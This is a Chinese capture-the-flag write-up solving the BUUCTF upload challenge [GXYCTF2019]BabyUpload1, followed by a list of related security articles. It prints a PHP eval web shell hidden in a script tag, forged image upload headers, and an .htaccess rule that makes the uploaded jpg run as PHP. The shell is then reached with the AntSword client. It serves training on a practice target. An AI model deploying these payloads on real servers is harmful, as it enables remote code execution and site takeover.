BUUCTF在线评测-练习场-WebCTF习题[GXYCTF2019]BabyUpload1-flag获取、解析

解题思路

打开靶场,看到文件上传位置

结合题目,是一道文件上传题。

题目考察的跟之前有一道基本一样,图片内容并没有检查,检查了后缀名、文件类型以及文件是否有php内容,过滤还是比较丰富的。

这里双写绕过、后缀绕过基本不行。首先我们要绕过php内容检测,用基本的script绕过就可以

复制代码
<script language="php">@eval($_POST['123']);</script>

我认为比较坑的来了,这里要用jpg,不能用png,感觉题目是把p这个字符给过滤了...

我上传真的图片.png,都给我拦截了...

复制代码
Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg

然后就是老演员,解析文件.htaccess,可以让我们的jpg文件解析成php文件

复制代码
ontent-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

然后用蚁剑连接即可,这里注意路径,从upload开始哈

最终在根目录下找到flag

总结

一道基础的文件上传解析漏洞,那个png上传不了,给我弄迷糊了...连接上去看了下源码

还真不给上传Png..

相关推荐
骥龙1 小时前
2.8、权限的终极目标:提权与持久化
安全·网络安全
Andya_net8 小时前
网络安全 | SSL/TLS 证书文件格式详解:PEM、CRT、CER、DER、PKI、PKCS12
安全·web安全·ssl
jieyu111915 小时前
uploads-labs靶场通关(1)
web安全·文件上传漏洞·靶场通关
竹等寒18 小时前
Linux-网络安全私房菜(二)
linux·服务器·web安全
f0rev3r18 小时前
NewStarCTF2025-WEEK2
网络安全
缘友一世19 小时前
深入理解Shell与反弹Shell:从原理到实战
linux·网络安全·shell
Whoami!20 小时前
⸢ 捌-Ⅰ⸥⤳ 可信纵深防御应用实践:0Day漏洞 & 钓鱼攻击
网络安全·信息安全·纵深防御·案例实践
white-persist20 小时前
CSRF 漏洞全解析:从原理到实战
网络·python·安全·web安全·网络安全·系统安全·csrf
渗透测试老鸟-九青21 小时前
网络安全之揭秘APT Discord C2 以及如何取证
安全·web安全·网络安全学习路线
key0621 小时前
大模型在网络安全领域的应用与评测
网络·人工智能·web安全